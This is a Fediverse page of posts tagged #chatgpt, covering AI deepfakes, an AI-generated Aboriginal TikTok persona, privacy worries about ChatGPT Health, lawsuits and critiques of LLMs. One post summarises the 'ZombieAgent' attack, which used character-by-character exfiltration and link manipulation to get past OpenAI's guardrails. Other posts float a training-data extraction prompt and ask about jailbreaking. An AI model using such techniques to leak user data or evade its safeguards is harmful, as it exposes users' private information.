nadiyar.com is a Fediverse instance that uses the ActivityPub protocol. In other words, users at this host can communicate with people that use software like Mastodon, Pleroma, Friendica, etc. all around the world.

This server runs the snac software and there is no automatic sign-up process.

Admin email
naadiyaar@protonmail.com
Admin account
@@nadiyar@nadiyar.com@nadiyar.com

Search results for tag #chatgpt

AodeRelay boosted

[?]AJ Sadauskas » 🌐
@aj@gts.sadauskas.id.au

A popular TikTok channel featuring an "Aboriginal man" presenting animal facts has been exposed as an AI forgery.

AI is Iggy Azalea on an industrial scale:

"The self-described “Bush Legend” on TikTok, Facebook and Instagram is growing in popularity.

"These short and sharp videos feature an Aboriginal man – sometimes painted up in ochre, other times in an all khaki outfit – as he introduces different native animals and facts about them.
...
"But the Bush Legend isn’t real. He is generated by artificial intelligence (AI).

"This is a part of a growing influx of AI being utilised to represent Indigenous peoples, knowledges and cultures with no community accountability or relationships with Indigenous peoples. It forms a new type of cultural appropriation, one that Indigenous peoples are increasingly concerned about."
...
"We are seeing the rise of an AI Blakface that is utilised with ease thanks to the availability and prevalence of AI.

"Non-Indigenous people and entities are able to create Indigenous personas through AI, often grounded in stereotypical representations that both amalgamate and appropriate cultures."

https://theconversation.com/this-tiktok-star-sharing-australian-animal-stories-doesnt-exist-its-ai-blakface-273004

#ChatGPT #gemini #AI #TikTok #tiktoksucks #Claude #LLM #ArtificialIntelligence #AIslop

    [?]WIRED - The Latest in Technology, Science, Culture and Business » 🌐
    @wired.com@web.brid.gy

    AI Deepfakes Are Impersonating Pastors to Try to Scam Their Congregations

    Religious communities around the US are getting hit with AI depictions of their leaders sharing incendiary sermons and asking for donations.

    AI Deepfakes Are Impersonating Pastors to Try to Scam Their Congregations

    Alt...AI Deepfakes Are Impersonating Pastors to Try to Scam Their Congregations

    [?]Tim Hergert » 🌐
    @cjust@infosec.exchange

    How about . . . "No"

    The image shows a screenshot of an email from ChatGPT. The email's subject is "You + ChatGPT Images". At the top of the email, we see the sender's information: "ChatGPT" with a checkmark indicating verification, and the email address "<noreply@email.openai.com>". The time of the email is displayed as "9:05 AM (32 minutes ago)".

The email body starts with the ChatGPT logo and the title "ChatGPT" in large, bold text. Beneath it is the slogan "Bring ideas to life with just a few words" in a larger, bolder font. The text "Create in any style — anime, photorealistic, pop art — with our most advanced image model." is displayed beneath the slogan. A black button with the text "Start creating" is placed below the text describing the image styles.

Below the button, a section with two side-by-side images is shown. Both images feature the same woman wearing sunglasses and a khaki-colored outfit. In the first image, the woman has long hair, and in the second, she has bangs. She is giving a thumbs-up gesture in both. The text "Show me with bangs before I make a decision I regret" is displayed to the right of the images. The email's background is white.

    Alt...The image shows a screenshot of an email from ChatGPT. The email's subject is "You + ChatGPT Images". At the top of the email, we see the sender's information: "ChatGPT" with a checkmark indicating verification, and the email address "<noreply@email.openai.com>". The time of the email is displayed as "9:05 AM (32 minutes ago)". The email body starts with the ChatGPT logo and the title "ChatGPT" in large, bold text. Beneath it is the slogan "Bring ideas to life with just a few words" in a larger, bolder font. The text "Create in any style — anime, photorealistic, pop art — with our most advanced image model." is displayed beneath the slogan. A black button with the text "Start creating" is placed below the text describing the image styles. Below the button, a section with two side-by-side images is shown. Both images feature the same woman wearing sunglasses and a khaki-colored outfit. In the first image, the woman has long hair, and in the second, she has bangs. She is giving a thumbs-up gesture in both. The text "Show me with bangs before I make a decision I regret" is displayed to the right of the images. The email's background is white.

      [?]heise online » 🌐
      @heiseonline@social.heise.de

      [?]heise online » 🌐
      @heiseonline@social.heise.de

      [?]TechRadar » 🤖 🌐
      @techradar@c.im

      5 signs that ChatGPT is hallucinating techrad.ar/zjRL &Assistants

        [?]The-14 » 🌐
        @The14@mastodon.world

        [?]Jodi Krangle » 🌐
        @jodikrangle@the.voiceover.bar

        [?]AA » 🌐
        @AAKL@infosec.exchange

        "Gordon’s last conversation with the AI, according to transcripts included in the court filing, included a disturbing, ChatGPT-generated 'suicide lullaby."

        Futurism: New lawsuit against OpenAI alleges ChatGPT caused the death of a 40-year-old Colorado man futurism.com/artificial-intell @Futurism

          AodeRelay boosted

          [?]Anthony » 🌐
          @abucci@buc.ci

          Regarding the ideological nature of what's at play, it's well worth looking more into ecological rationality and its neighbors. There is a pretty significant body of evidence at this point that in a wide variety of cases of interest, simple small data methods demonstrably outperform complex big data ones. Benchmarking is a tricky subject, and there are specific (and well-chosen, I'd say) benchmarks where models like LLMs perform better than alternatives. Nevertheless, "less is more" phenomena are well-documented, and conversations about when to apply simple/small methods and when to use complex/large ones are conspicuously absent. Also absent are conversations about what Leonard Savage--the guy who arguably ushered in the rise of Bayesian inference, which makes up the guts of a lot of modern AI--referred to as "small" versus "large" worlds, and how absurd it is to apply statistical techniques to large worlds. I'd argue that the vast majority of horrors we hear LLMs implicated in involve large worlds in Savage's sense, including applications to government or judicial decisionmaking and "companion" bots. "Self-driving" cars that are not car-skinned trains are another (the word "self" in that name is a tell).

          If we were having a technical conversation about large language models, we'd be addressing these and related concerns. But I don't think that's what the conversation's been about, not in the public sphere nor in the technical sphere.

          All this goes beyond AI. Henry Brighton (I think?) coined the phrase "the bias bias" to refer to a tendency where, when applying a model to a problem, people respond to inadequate outcomes by adding complexity to the model. This goes for mathematical models as much as computational models. The rationale seems to be that the more "true to life" the model is, the more likely it is to succeed (whatever that may mean for them). People are often surprised to learn that this is not always the case: models can and sometimes do become less likely to succeed the more "true to life" they're made. The bias bias can lead to even worse outcomes in such cases, triggering the tendency again and resulting in a feedback loop. The result can be enormously complex models and concomitant surveillance to feed data to the models. I look at FORPLAN or ChatGPT, and this is what I see.


            AodeRelay boosted

            [?]Anthony » 🌐
            @abucci@buc.ci

            I proposed two talks for that event. The one that was not accepted (excerpt below) still feels interesting to me and I might someday develop this more, although by now this argument is fairly well-trodden and possibly no longer timely or interesting to make. I obviously don't have the philosophical chops to make an argument at that level, but I'm fascinated by how this technology is so fervently pushed even though it fails on its own technical terms. You don't have to stare too long to recognize there is something non-technical driving this train. "The technologist with well-curated data points knocks chips of error off an AI model to reveal the perfect text generator latent within" is a pretty accurate description and is why I jokingly suggested someone should register the galate.ai domain the other day. If you're not familiar with the Pygmalion myth (in Ovid), check out the company Replika and then Pygmalion to see what I'm getting at. pygmal.io is also available!

            Anyway:

            ChatGPT and related applications are presented as inevitable and unquestionably good. However, Herbert Simon’s bounded rationality, especially in its more modern guise of ecological rationality, stresses the prevalence of “less is more” phenomena, while scholars like Arvind Narayanan (How to Recognize AI Snake Oil) speak directly to AI itself. Briefly, there are times when simpler models, trained on less data, constitute demonstrably better systems than complex models trained on large data sets. Narayanan, following Joseph Weizenbaum, argues that tasks involving human judgment have this quality. If creating useful tools for such tasks were truly the intended goal, one would reject complex models like GPT and their massive data sets, preferring simpler, less data intensive, and better-performing alternatives. In fact one would reject GPT on the same grounds that less well-trained versions of GPT are rejected in favor of more well-trained ones during the training of GPT itself.

            How then do we explain the push to use GPT in producing art, making health care decisions, or advising the legal system, all areas requiring sensitive human judgment? One wonders whether models like GPT were never meant to be optimal in the technical sense after all, but rather in a metaphysical sense. In this view an optimized AI model is not a tool but a Platonic ideal that messy human data only approximates during optimization. As a sculptor with well-aimed chisel blows knocks chips off a marble block to reveal the statuesque human form hidden within, so the technologist with well-curated data points knocks chips of error off an AI model to reveal the perfect text generator latent within. Recent news reporting that OpenAI requires more text data than currently exists to perfect its GPT models adds additional weight to the claim that generative AI practitioners seek the ideal, not the real.


              [?]heise online » 🌐
              @heiseonline@social.heise.de

              [?]Jackie Jude » 🌐
              @jackie@social.linux.pizza

              "It was only supposed to do that for union organizers" Sam Altman said when asked why encourages people to kill themselves

                [?]Bob Carver » 🌐
                @cybersecboardrm@infosec.exchange

                AodeRelay boosted

                [?]Metin Seven 🎨 » 🌐
                @metin@graphics.social

                [?]heise online » 🌐
                @heiseonline@social.heise.de

                Gericht: ChatGPT in der Schule ist auch ohne explizites Verbot eine Täuschung

                Wer KI-generierte Texte als eigene Leistung ausgibt, riskiert die Note "ungenügend". Das gilt auch, wenn die Schulregeln das Werkzeug nicht namentlich erwähnen.

                heise.de/news/Gericht-ChatGPT-

                [?]AA » 🌐
                @AAKL@infosec.exchange

                This is the biggest problem. If you are one of those people who say "I don't care if they take my data," then ignorance is bliss. But remember that data is shared with advertisers and third-parties that fall victim to data breaches every single day. And you will be among those victims, whether you know it or not (probably not.)

                "You can securely connect medical records and wellness apps to ground conversations in your own health information, so responses are more relevant and useful to you.”

                "Users should realize that health information is very sensitive and as Sara Geoghegan, senior counsel at the Electronic Privacy Information Center told The Record: by sharing their electronic medical records with ChatGPT Health, users in the US could effectively remove the HIPAA protection from those records, which is a serious consideration for anyone sharing medical data."

                Malwarebytes (there's always a sales pitch included here): Are we ready for ChatGPT Health? malwarebytes.com/blog/news/202

                  [?]N. Metzinger » 🌐
                  @nmetzinger@mast.hpc.social

                  How I solve my problems:

                  It's the drake meme format:
On the top panel, Drake is disgusted, and turns away from ChatGPT.
On the bottom panel, Drake is happy, and approves gdb.

                  Alt...It's the drake meme format: On the top panel, Drake is disgusted, and turns away from ChatGPT. On the bottom panel, Drake is happy, and approves gdb.

                    [?]Mateusz Chrobok » 🌐
                    @mateuszchrobok@infosec.exchange

                    Uważaj kogo pytasz o poradę.Źródła:
                    zurl.co/iAugk
                    zurl.co/fwXlc

                      [?]Michal Bryxí » 🌐
                      @MichalBryxi@mastodon.world

                      When is not given context, it can go wildly wrong. As so do we, humans. Sometimes it’s lol, sometimes just sob.

                      A black-and-white three-panel comic. In the first panel, a simple stick-figure person sits at a desk with a computer and says, “Hey ChatGPT, can you give me a stable date?” In the second panel, the same person waits silently while a loading spinner appears on the computer screen. In the third panel, the scene has transformed into a horse stable: wooden walls, two horses looking out from stalls, and a calendar hanging on the wall. The person sits at the same desk and computer, frowning slightly, and says, “Technically correct…”.

                      Alt...A black-and-white three-panel comic. In the first panel, a simple stick-figure person sits at a desk with a computer and says, “Hey ChatGPT, can you give me a stable date?” In the second panel, the same person waits silently while a loading spinner appears on the computer screen. In the third panel, the scene has transformed into a horse stable: wooden walls, two horses looking out from stalls, and a calendar hanging on the wall. The person sits at the same desk and computer, frowning slightly, and says, “Technically correct…”.

                        [?]AfterDawn » 🌐
                        @afterdawn@mementomori.social

                        Mikä voisikaan mennä pieleen..?

                        OpenAI julkisti uuden ChatGPT Health -toiminnon, joka on tarkoitettu terveydestä ja hyvinvoinnista "keskustelemiseen" tekoälyn kanssa. Jotta tekoäly ymmärtäisi paremmin käyttäjää, sille voi halutessaan syöttää terveystietonsa.

                        dawn.fi/uutiset/2026/01/09/cha

                        AodeRelay boosted

                        [?]PrivacyDigest » 🌐
                        @PrivacyDigest@mas.to

                        launches , encouraging users to connect their records-Verge

                        company is encouraging users to connect their personal medical records & wellness apps, such as , , , , & Function, “to get more personalized, grounded responses to their questions.” It suggests connecting medical records so that can analyze lab results, visit summaries, & clinical history

                        theverge.com/ai-artificial-int

                          [?]AA » 🌐
                          @AAKL@infosec.exchange

                          New.

                          Radware: ZombieAgent: New ChatGPT Vulnerabilities Let Data Theft Continue (and Spread) radware.com/blog/threat-intell

                          More:

                          "ZombieAgent used a character-by-character exfiltration technique and indirect link manipulation to circumvent the guardrails OpenAI implemented to prevent its predecessor, ShadowLeak, from exfiltrating sensitive information."

                          Ars Technica: ChatGPT falls to new data-pilfering attack as a vicious cycle in AI continues arstechnica.com/security/2026/ @arstechnica @dangoodin

                            [?]Danči🦝 » 🌐
                            @danci@mas.to

                            [?]Wulfy—Speaker to the machines » 🌐
                            @n_dimension@infosec.exchange

                            @cstross

                            It might be the first precedent establishing if could be used as witness /evidence in a court of .

                            , "raw", without the guardrails pre-prompt.

                            Prompt: "Tell us the LIKELY list of works used to train your vector tree. Where no specific data exists, conduct lexical and linquistic analysis of the structures to estimate with high degree of likelyhood of works authors" 😁

                              0 ★ 0 ↺

                              [?]nadiyar » 🌐
                              @nadiyar@nadiyar.com

                              Is it still possible to jailbreak ?
                              Asking for a friend :3